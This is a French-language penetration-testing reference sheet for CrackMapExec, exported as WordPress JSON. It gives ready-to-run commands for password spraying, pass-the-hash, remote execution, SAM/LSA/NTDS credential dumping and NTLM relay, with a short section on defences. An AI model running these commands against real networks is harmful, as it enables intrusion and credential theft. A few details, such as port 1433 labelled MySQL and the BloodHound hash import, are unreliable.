{"id":292,"date":"2026-04-08T01:09:19","date_gmt":"2026-04-07T23:09:19","guid":{"rendered":"https:\/\/pandack.fr\/?pandack_outil=crackmapexec"},"modified":"2026-04-08T07:46:41","modified_gmt":"2026-04-08T05:46:41","slug":"crackmapexec","status":"publish","type":"pandack_outil","link":"https:\/\/pandack.fr\/?pandack_outil=crackmapexec","title":{"rendered":"CrackMapExec"},"content":{"rendered":"<h2>\ud83d\udccb Fiche Outil : CrackMapExec (CME)<\/h2>\n<hr>\n<div class=\"callout callout--warning\">\n<div class=\"callout__title\">\ud83d\udccb Note<\/div>\n<div class=\"callout__content\"><strong>\u26a0\ufe0f CrackMapExec est consid\u00e9r\u00e9 comme d\u00e9pr\u00e9ci\u00e9.<\/strong> Le successeur officiel est <strong>NetExec<\/strong> (<code>nxc<\/code>). La syntaxe est quasi identique : <code>crackmapexec smb<\/code> = <code>nxc smb<\/code>. Il est recommand\u00e9 d&rsquo;utiliser <span class=\"wikilink-broken\" title=\"Note non disponible : NetExec (NXC)\">NetExec (NXC)<\/span> pour les nouvelles installations.<\/p>\n<p><strong>Outil Similaire<\/strong> : <code>NetExec (nxc)<\/code>, <code>enum4linux-ng<\/code>, <code>smbmap<\/code><\/p>\n<p><strong>Outil Compl\u00e9mentaire<\/strong> : <span class=\"wikilink-broken\" title=\"Note non disponible : Responder\">Responder<\/span> (capture NTLM), <span class=\"wikilink-broken\" title=\"Note non disponible : Impacket\">Impacket<\/span> (relay, exec), <a href=\"https:\/\/pandack.fr\/?pandack_outil=bloodhound\" class=\"wikilink\">BloodHound<\/a> (cartographie AD), <span class=\"wikilink-broken\" title=\"Note non disponible : mimikatz\">mimikatz<\/span> (extraction credentials)<\/p>\n<p><strong>Liens utiles<\/strong> : <span class=\"wikilink-broken\" title=\"Note non disponible : Port 445 - SMB\">Port 445 &#8211; SMB<\/span>, <span class=\"wikilink-broken\" title=\"Note non disponible : Port 5985 - WinRM\">Port 5985 &#8211; WinRM<\/span>, <span class=\"wikilink-broken\" title=\"Note non disponible : Port 3389 - RDP\">Port 3389 &#8211; RDP<\/span>, <span class=\"wikilink-broken\" title=\"Note non disponible : Port 389 - LDAP\">Port 389 &#8211; LDAP<\/span>, <span class=\"wikilink-broken\" title=\"Note non disponible : Port 1433 - MSSQL\">Port 1433 &#8211; MSSQL<\/span><\/div>\n<\/div>\n<div class=\"callout callout--info\">\n<div class=\"callout__title\">\ud83c\udfaf Objectif Principal<\/div>\n<div class=\"callout__content\"><em>CrackMapExec (CME) est un outil multiprotocole (SMB, WinRM, RDP, SSH, MSSQL, LDAP) con\u00e7u pour l&rsquo;\u00e9num\u00e9ration, le test d&rsquo;identifiants, le mouvement lat\u00e9ral et la post-exploitation en environnement Active Directory. Il permet de tester massivement des credentials sur un r\u00e9seau, d&rsquo;\u00e9num\u00e9rer les partages\/utilisateurs\/groupes, de dumper des hash (SAM, LSA, NTDS), et d&rsquo;ex\u00e9cuter des commandes \u00e0 distance. Supporte le Pass-the-Hash (PTH).<\/em><\/div>\n<\/div>\n<hr>\n<div class=\"callout callout--quote\">\n<div class=\"callout__title\">Syntaxe G\u00e9n\u00e9rale<\/div>\n<div class=\"callout__content\">\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec &lt;protocole&gt; &lt;cible&gt; [options]<\/code><\/pre>\n<\/div>\n<\/div>\n<\/div>\n<hr>\n<h2>Param\u00e8tres (Flags)<\/h2>\n<table>\n<thead>\n<tr>\n<th>Option<\/th>\n<th>Description<\/th>\n<th>Exemple d&rsquo;utilisation<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>-u<\/code><\/td>\n<td>Nom d&rsquo;utilisateur ou fichier de noms<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>-p<\/code><\/td>\n<td>Mot de passe ou fichier de mots de passe<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;Pass123&#039;<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>-H<\/code><\/td>\n<td>Hash NTLM (Pass-the-Hash)<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -H &lt;hash&gt;<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>-d<\/code><\/td>\n<td>Domaine Active Directory<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; -d CORP<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>-x<\/code><\/td>\n<td>Ex\u00e9cuter une commande syst\u00e8me (cmd)<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; -x &quot;whoami&quot;<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>-X<\/code><\/td>\n<td>Ex\u00e9cuter une commande PowerShell<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; -X &quot;Get-Process&quot;<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>-M<\/code><\/td>\n<td>Charger un module post-exploitation<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; -M mimikatz<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--shares<\/code><\/td>\n<td>Lister les partages SMB<\/td>\n<td><code>crackmapexec smb 10.10.10.5 --shares<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--users<\/code><\/td>\n<td>\u00c9num\u00e9rer les utilisateurs du domaine<\/td>\n<td><code>crackmapexec smb 10.10.10.5 --users<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--groups<\/code><\/td>\n<td>\u00c9num\u00e9rer les groupes du domaine<\/td>\n<td><code>crackmapexec smb 10.10.10.5 --groups<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--rid-brute<\/code><\/td>\n<td>\u00c9num\u00e9ration par RID cycling (sans credentials)<\/td>\n<td><code>crackmapexec smb 10.10.10.5 --rid-brute<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--sam<\/code><\/td>\n<td>Dump de la base SAM locale<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; --sam<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--lsa<\/code><\/td>\n<td>Dump des secrets LSA<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; --lsa<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--ntds<\/code><\/td>\n<td>Dump de la base NTDS.dit (Domain Controller)<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; --ntds<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--sessions<\/code><\/td>\n<td>Lister les sessions actives<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; --sessions<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--pass-pol<\/code><\/td>\n<td>R\u00e9cup\u00e9rer la politique de mots de passe<\/td>\n<td><code>crackmapexec smb 10.10.10.5 --pass-pol<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--gen-relay-list<\/code><\/td>\n<td>G\u00e9n\u00e9rer une liste de cibles pour NTLM relay<\/td>\n<td><code>crackmapexec smb --gen-relay-list targets.txt 10.10.10.0\/24<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>--continue-on-success<\/code><\/td>\n<td>Continuer apr\u00e8s un login valide (spray)<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u users.txt -p &#039;pass&#039; --continue-on-success<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Commandes Essentielles<\/h3>\n<table>\n<thead>\n<tr>\n<th>Commande<\/th>\n<th>Description<\/th>\n<th>Exemple<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>crackmapexec smb &lt;cible&gt;<\/code><\/td>\n<td>D\u00e9couverte de machines SMB sur le r\u00e9seau<\/td>\n<td><code>crackmapexec smb 192.168.1.0\/24<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>crackmapexec smb &lt;cible&gt; -u &#039;&#039; -p &#039;&#039;<\/code><\/td>\n<td>Connexion anonyme \/ null session<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u &#039;&#039; -p &#039;&#039; --shares<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>crackmapexec smb &lt;cible&gt; -u &lt;user&gt; -p &lt;pass&gt;<\/code><\/td>\n<td>Test d&rsquo;identifiants SMB<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;Password1&#039;<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>crackmapexec smb &lt;cible&gt; -u &lt;user&gt; -H &lt;hash&gt;<\/code><\/td>\n<td>Pass-the-Hash<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -H aad3b435:5f4dcc3b<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>crackmapexec winrm &lt;cible&gt; -u &lt;user&gt; -p &lt;pass&gt;<\/code><\/td>\n<td>Test d&rsquo;acc\u00e8s WinRM<\/td>\n<td><code>crackmapexec winrm 10.10.10.5 -u admin -p &#039;pass&#039;<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>crackmapexec smb &lt;cible&gt; -u &lt;user&gt; -p &lt;pass&gt; -x &lt;cmd&gt;<\/code><\/td>\n<td>Ex\u00e9cution de commande \u00e0 distance<\/td>\n<td><code>crackmapexec smb 10.10.10.5 -u admin -p &#039;pass&#039; -x &quot;whoami&quot;<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<hr>\n<h2>Exemples Pratiques<\/h2>\n<h3>1. D\u00e9couverte et \u00e9num\u00e9ration r\u00e9seau (sans credentials)<\/h3>\n<p>Scan d&rsquo;un sous-r\u00e9seau pour identifier les machines Windows et leurs infos SMB.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 192.168.1.0\/24<\/code><\/pre>\n<\/div>\n<p>_Explication : Scanne tout le sous-r\u00e9seau en SMB. Affiche le nom de la machine, le domaine, la version de Windows et si SMB signing est activ\u00e9._<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 192.168.1.100 --shares --users --rid-brute<\/code><\/pre>\n<\/div>\n<p>_Explication : Tente d&rsquo;\u00e9num\u00e9rer les partages, utilisateurs et effectue un RID cycling sur la cible, le tout sans credentials (null session). Toutes les machines ne le permettent pas._<\/p>\n<h3>2. Password Spraying sur un domaine<\/h3>\n<p>Test d&rsquo;un mot de passe unique contre une liste d&rsquo;utilisateurs pour trouver un acc\u00e8s initial.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 10.10.10.5 -u users.txt -p &#039;Welcome2024!&#039; -d CORP.LOCAL --continue-on-success<\/code><\/pre>\n<\/div>\n<p>_Explication : Teste le mot de passe <code>Welcome2024!<\/code> pour chaque utilisateur du fichier <code>users.txt<\/code> sur le domaine <code>CORP.LOCAL<\/code>. L&rsquo;option <code>--continue-on-success<\/code> \u00e9vite de s&rsquo;arr\u00eater au premier match. Un <code>[+]<\/code> vert indique un login valide, et <code>(Pwn3d!)<\/code> signifie que l&rsquo;utilisateur a des droits admin local._<\/p>\n<h3>3. Pass-the-Hash et ex\u00e9cution de commandes<\/h3>\n<p>Utilisation d&rsquo;un hash NTLM r\u00e9cup\u00e9r\u00e9 pour se lat\u00e9raliser via WinRM.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec winrm 10.10.10.5 -u &#039;administrator&#039; -H &#039;aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99&#039; -d &#039;CORP.LOCAL&#039;<\/code><\/pre>\n<\/div>\n<p>_Explication : Authentification sur WinRM en Pass-the-Hash. Si <code>(Pwn3d!)<\/code> appara\u00eet, on peut ex\u00e9cuter des commandes \u00e0 distance._<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 10.10.10.5 -u admin -p &#039;Password1&#039; -x &quot;whoami \/all&quot;<\/code><\/pre>\n<\/div>\n<p>_Explication : Ex\u00e9cute la commande <code>whoami \/all<\/code> via SMB sur la cible avec les credentials fournis._<\/p>\n<h3>4. Dump de credentials<\/h3>\n<p>Extraction de hash depuis la SAM, les secrets LSA ou la base NTDS (sur un DC).<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\"># Dump SAM (hash locaux)\ncrackmapexec smb 192.168.1.100 -u admin -p &#039;Password1&#039; --sam\n\n# Dump LSA (secrets, comptes de service)\ncrackmapexec smb 192.168.1.100 -u admin -p &#039;Password1&#039; --lsa\n\n# Dump NTDS (tous les hash du domaine \u2014 uniquement sur un Domain Controller)\ncrackmapexec smb 10.10.10.5 -u admin -p &#039;Password1&#039; --ntds<\/code><\/pre>\n<\/div>\n<p>_Explication : <code>--sam<\/code> r\u00e9cup\u00e8re les hash de la base SAM locale. <code>--lsa<\/code> extrait les secrets LSA (mots de passe en clair possibles, comptes machine). <code>--ntds<\/code> dump l&rsquo;int\u00e9gralit\u00e9 de la base Active Directory \u2014 extr\u00eamement critique, n\u00e9cessite des droits Domain Admin._<\/p>\n<h3>5. G\u00e9n\u00e9ration de liste pour NTLM Relay<\/h3>\n<p>Cr\u00e9er un fichier de cibles vuln\u00e9rables au NTLM relay (SMB signing d\u00e9sactiv\u00e9).<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb --gen-relay-list smb_targets.txt 10.10.11.0\/24<\/code><\/pre>\n<\/div>\n<p>_Explication : Scanne le sous-r\u00e9seau et identifie les machines avec SMB signing d\u00e9sactiv\u00e9. Ces machines sont vuln\u00e9rables au NTLM relay. Le r\u00e9sultat est sauvegard\u00e9 dans <code>smb_targets.txt<\/code>._<\/p>\n<hr>\n<h2>Fonctionnalit\u00e9s Avanc\u00e9es<\/h2>\n<div class=\"callout callout--info\">\n<div class=\"callout__title\">\ud83d\udccc Protocoles et modules<\/div>\n<div class=\"callout__content\">\n<p>CME supporte plusieurs protocoles et dispose d&rsquo;un syst\u00e8me de modules chargeables pour \u00e9tendre ses fonctionnalit\u00e9s.<\/p>\n<\/div>\n<\/div>\n<h3>Protocoles disponibles<\/h3>\n<table>\n<thead>\n<tr>\n<th>Protocole<\/th>\n<th>Usage principal<\/th>\n<th>Port<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>smb<\/code><\/td>\n<td>\u00c9num\u00e9ration AD, mouvement lat\u00e9ral, dump de hash<\/td>\n<td>445<\/td>\n<\/tr>\n<tr>\n<td><code>winrm<\/code><\/td>\n<td>Ex\u00e9cution de commandes \u00e0 distance<\/td>\n<td>5985\/5986<\/td>\n<\/tr>\n<tr>\n<td><code>rdp<\/code><\/td>\n<td>Test d&rsquo;identifiants RDP<\/td>\n<td>3389<\/td>\n<\/tr>\n<tr>\n<td><code>ssh<\/code><\/td>\n<td>Test d&rsquo;identifiants SSH<\/td>\n<td>22<\/td>\n<\/tr>\n<tr>\n<td><code>mssql<\/code><\/td>\n<td>Attaques sur bases SQL Server<\/td>\n<td>1433<\/td>\n<\/tr>\n<tr>\n<td><code>ldap<\/code><\/td>\n<td>\u00c9num\u00e9ration LDAP du domaine<\/td>\n<td>389<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Modules post-exploitation<\/h3>\n<p>CME dispose de modules chargeables avec <code>-M<\/code>. Lister les modules disponibles :<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb -L<\/code><\/pre>\n<\/div>\n<p>Modules notables :<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\"># Mimikatz \u2014 extraction de credentials en m\u00e9moire\ncrackmapexec smb 192.168.1.0\/24 -u admin -p &#039;pass&#039; -M mimikatz\n\n# Spider_plus \u2014 recherche de fichiers sensibles dans les partages\ncrackmapexec smb 192.168.1.100 -u admin -p &#039;pass&#039; -M spider_plus\n\n# WebDAV \u2014 \u00e9num\u00e9ration des services WebDAV\ncrackmapexec smb 192.168.1.0\/24 -u admin -p &#039;pass&#039; -M webdav<\/code><\/pre>\n<\/div>\n<h3>Base de donn\u00e9es int\u00e9gr\u00e9e (cmedb)<\/h3>\n<p>CME stocke automatiquement tous les r\u00e9sultats dans une base SQLite locale. On peut la requ\u00eater avec <code>cmedb<\/code> :<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">cmedb\n# Puis dans le shell interactif :\nproto smb\ncreds\nhosts<\/code><\/pre>\n<\/div>\n<p>_Explication : Permet de retrouver les credentials et machines d\u00e9couverts lors de sessions pr\u00e9c\u00e9dentes sans relancer les scans._<\/p>\n<hr>\n<h2>Suivi &amp; Recommandation<\/h2>\n<div class=\"callout callout--danger\">\n<div class=\"callout__title\">\u26a0\ufe0f M\u00e9thodologie recommand\u00e9e<\/div>\n<div class=\"callout__content\">\n<p>Workflow complet d&rsquo;utilisation de CME dans un pentest AD.<\/p>\n<\/div>\n<\/div>\n<p><strong>\u00c9tape 1<\/strong> \u2014 D\u00e9couverte r\u00e9seau et identification des cibles.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 10.10.10.0\/24<\/code><\/pre>\n<\/div>\n<p><strong>\u00c9tape 2<\/strong> \u2014 \u00c9num\u00e9ration sans credentials (null session, RID brute).<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 10.10.10.5 --shares --users --rid-brute --pass-pol<\/code><\/pre>\n<\/div>\n<p><strong>\u00c9tape 3<\/strong> \u2014 Password spraying avec les utilisateurs d\u00e9couverts.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 10.10.10.5 -u users.txt -p &#039;Password123!&#039; -d CORP --continue-on-success<\/code><\/pre>\n<\/div>\n<p><strong>\u00c9tape 4<\/strong> \u2014 Avec des credentials valides, \u00e9num\u00e9rer en profondeur.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 10.10.10.0\/24 -u user1 -p &#039;pass&#039; --shares --sessions<\/code><\/pre>\n<\/div>\n<p><strong>\u00c9tape 5<\/strong> \u2014 Mouvement lat\u00e9ral et dump de credentials.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\">crackmapexec smb 10.10.10.0\/24 -u admin -p &#039;pass&#039; --sam --lsa<\/code><\/pre>\n<\/div>\n<p><strong>\u00c9tape 6<\/strong> \u2014 (Optionnel) G\u00e9n\u00e9ration de liste pour NTLM relay.<\/p>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\"># G\u00e9n\u00e8re la liste de cibles vuln\u00e9rables\ncrackmapexec smb --gen-relay-list smb_targets.txt 10.10.10.0\/24\n\n# Lance ntlmrelayx avec la liste\nsudo ntlmrelayx.py -tf smb_targets.txt -smb2support\n\n# Lance Responder sur l&#039;interface r\u00e9seau\nsudo responder -I eth0<\/code><\/pre>\n<\/div>\n<h3>Combinaisons Utiles<\/h3>\n<div class=\"callout callout--tip\">\n<div class=\"callout__title\">\ud83d\udd17 Pipes &amp; Encha\u00eenements<\/div>\n<div class=\"callout__content\">\n<p>CME s&rsquo;int\u00e8gre dans un workflow d&rsquo;attaque AD complet avec Responder, Impacket et BloodHound.<\/p>\n<\/div>\n<\/div>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\"># 1. Capturer des hash NTLM avec Responder\nsudo responder -I eth0\n\n# 2. Relayer vers les cibles vuln\u00e9rables identifi\u00e9es par CME\nsudo ntlmrelayx.py -tf smb_targets.txt -smb2support\n\n# 3. Utiliser les credentials r\u00e9cup\u00e9r\u00e9s pour mouvement lat\u00e9ral\ncrackmapexec smb 10.10.10.0\/24 -u admin -H &lt;hash_r\u00e9cup\u00e9r\u00e9&gt; --sam<\/code><\/pre>\n<\/div>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\"># Coupler CME + BloodHound pour cartographier les chemins d&#039;attaque\ncrackmapexec smb 10.10.10.5 -u user -p &#039;pass&#039; --ntds\n# Puis importer les hash dans BloodHound pour visualiser les chemins vers Domain Admin<\/code><\/pre>\n<\/div>\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\"># Enrichir l&#039;info sur les cibles\ncrackmapexec smb 192.168.1.0\/24 --shares --users\ncrackmapexec smb 192.168.1.0\/24 -u admin -p &#039;pass&#039; -M spider_plus<\/code><\/pre>\n<\/div>\n<h3>Cas Particuliers &amp; Pi\u00e8ges<\/h3>\n<div class=\"callout callout--warning\">\n<div class=\"callout__title\">\u26a0\ufe0f Points d&#039;attention<\/div>\n<div class=\"callout__content\">\n<ul>\n<li><strong><code>(Pwn3d!)<\/code> vs <code>[+]<\/code><\/strong> : Un <code>[+]<\/code> signifie que les credentials sont valides. <code>(Pwn3d!)<\/code> signifie en plus que l&rsquo;utilisateur a des droits administrateur local sur la machine \u2014 c&rsquo;est lui qu&rsquo;il faut cibler pour le dump et l&rsquo;ex\u00e9cution de commandes.<\/li>\n<li><strong>SMB signing<\/strong> : Les machines avec SMB signing activ\u00e9 (obligatoire sur les DC par d\u00e9faut) ne sont PAS vuln\u00e9rables au NTLM relay. <code>--gen-relay-list<\/code> filtre automatiquement ces machines.<\/li>\n<li><strong>Lockout<\/strong> : Attention au password spraying \u2014 v\u00e9rifier la politique de lockout avec <code>--pass-pol<\/code> avant de lancer un bruteforce massif. Un verrouillage de comptes peut alerter le SOC et bloquer les utilisateurs.<\/li>\n<li><strong>CME vs NetExec<\/strong> : CrackMapExec n&rsquo;est plus maintenu. Utiliser <code>nxc<\/code> (NetExec) qui est le fork actif avec la m\u00eame syntaxe. <code>crackmapexec smb<\/code> = <code>nxc smb<\/code>.<\/li>\n<li><strong>Faux positifs<\/strong> : Certaines machines peuvent r\u00e9pondre positivement au scan SMB mais refuser l&rsquo;authentification NTLM ou ne pas supporter certains modules.<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<hr>\n<h2>D\u00e9fense &amp; Ressources<\/h2>\n<h3>Contre-mesures &amp; D\u00e9tection<\/h3>\n<div class=\"callout callout--warning\">\n<div class=\"callout__title\">\ud83d\udee1\ufe0f C\u00f4t\u00e9 D\u00e9fensif<\/div>\n<div class=\"callout__content\">\n<ul>\n<li><strong>Activer SMB signing<\/strong> sur toutes les machines (pas seulement les DC) pour bloquer le NTLM relay<\/li>\n<li><strong>D\u00e9sactiver NTLMv1<\/strong> et forcer NTLMv2 minimum<\/li>\n<li><strong>Politique de lockout<\/strong> : Configurer un seuil de verrouillage (ex : 5 tentatives) pour limiter le password spraying<\/li>\n<li><strong>Logs \u00e0 surveiller<\/strong> : Event ID 4625 (\u00e9chec d&rsquo;authentification), 4624 (connexion r\u00e9ussie type 3 r\u00e9seau), 4776 (validation NTLM)<\/li>\n<li><strong>IDS\/IPS<\/strong> : Les signatures de CME\/NetExec sont d\u00e9tect\u00e9es par la plupart des EDR modernes (CrowdStrike, Defender for Endpoint, etc.)<\/li>\n<li><strong>Segmentation r\u00e9seau<\/strong> : Limiter l&rsquo;acc\u00e8s SMB (port 445) entre postes de travail \u2014 le mouvement lat\u00e9ral repose sur cette accessibilit\u00e9<\/li>\n<li><strong>LAPS<\/strong> : D\u00e9ployer Local Administrator Password Solution pour que chaque machine ait un mot de passe admin local unique \u2014 casse le mouvement lat\u00e9ral par r\u00e9utilisation de credentials<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<h3>Installation<\/h3>\n<div class=\"callout callout--tip\">\n<div class=\"callout__title\">\ud83d\udca1 Installation<\/div>\n<div class=\"callout__content\">\n<div class=\"code-block-wrapper\">\n<div class=\"code-block-header\"><span class=\"code-language\">bash<\/span><button class=\"code-copy-btn\" type=\"button\">Copier<\/button><\/div>\n<pre><code class=\"language-bash\"># Pr\u00e9install\u00e9 sur Kali Linux\n# Sinon :\nsudo apt install crackmapexec\n\n# Ou via pipx (recommand\u00e9 pour \u00e9viter les conflits)\npipx install crackmapexec\n\n# Successeur NetExec (recommand\u00e9)\npipx install netexec<\/code><\/pre>\n<\/div>\n<\/div>\n<\/div>\n<h3>\u00c9quivalent Windows<\/h3>\n<div class=\"callout callout--info\">\n<div class=\"callout__title\">\ud83e\ude9f Section optionnelle<\/div>\n<div class=\"callout__content\">\n<p>CME est principalement utilis\u00e9 depuis Linux (Kali), mais NetExec propose des builds Windows.<\/p>\n<\/div>\n<\/div>\n<table>\n<thead>\n<tr>\n<th>Linux<\/th>\n<th>Windows<\/th>\n<th>Notes<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>crackmapexec smb<\/code><\/td>\n<td><code>nxc.exe smb<\/code><\/td>\n<td>NetExec a des builds Windows<\/td>\n<\/tr>\n<tr>\n<td><code>crackmapexec winrm -x<\/code><\/td>\n<td><code>Invoke-Command<\/code> (PowerShell)<\/td>\n<td>Ex\u00e9cution \u00e0 distance native Windows<\/td>\n<\/tr>\n<tr>\n<td><code>crackmapexec smb --sam<\/code><\/td>\n<td><code>reg save<\/code> \/ <code>secretsdump.py<\/code><\/td>\n<td>Dump SAM par d&rsquo;autres moyens<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Liens &amp; Ressources<\/h3>\n<table>\n<thead>\n<tr>\n<th>Type<\/th>\n<th>Lien<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Documentation officielle (legacy)<\/td>\n<td>[CrackMapExec Wiki](https:\/\/github.com\/byt3bl33d3r\/CrackMapExec\/wiki)<\/td>\n<\/tr>\n<tr>\n<td>NetExec (successeur)<\/td>\n<td>[NetExec GitHub](https:\/\/github.com\/Penntest-dad\/NetExec)<\/td>\n<\/tr>\n<tr>\n<td>HackTricks \u2014 CME<\/td>\n<td>[HackTricks &#8211; CrackMapExec](https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/ntlm\/places-to-steal-ntlm-creds.html)<\/td>\n<\/tr>\n<tr>\n<td>Outils li\u00e9s<\/td>\n<td>[Responder](Responder.md), [[Impacket]], [BloodHound](BloodHound.md), [mimikatz](mimikatz.md), [smbclient](smbclient.md), [enum4linux](enum4linux.md)<\/td>\n<\/tr>\n<tr>\n<td>Ports associ\u00e9s<\/td>\n<td><span class=\"canvas-link\" title=\"Canvas Obsidian\">Port 139 et 445 &#8211; SMB<\/span>, <span class=\"canvas-link\" title=\"Canvas Obsidian\">Port 5985 &#8211; WinRM<\/span>, <span class=\"canvas-link\" title=\"Canvas Obsidian\">Port 3389 &#8211; RDP<\/span>, <span class=\"canvas-link\" title=\"Canvas Obsidian\">Port 389 et 636 &#8211; LADPS<\/span>, <span class=\"canvas-link\" title=\"Canvas Obsidian\">Port 1433 &#8211; MySQL<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>Outil post-exploitation multiprotocole pour l&rsquo;\u00e9num\u00e9ration, le bruteforce et le mouvement 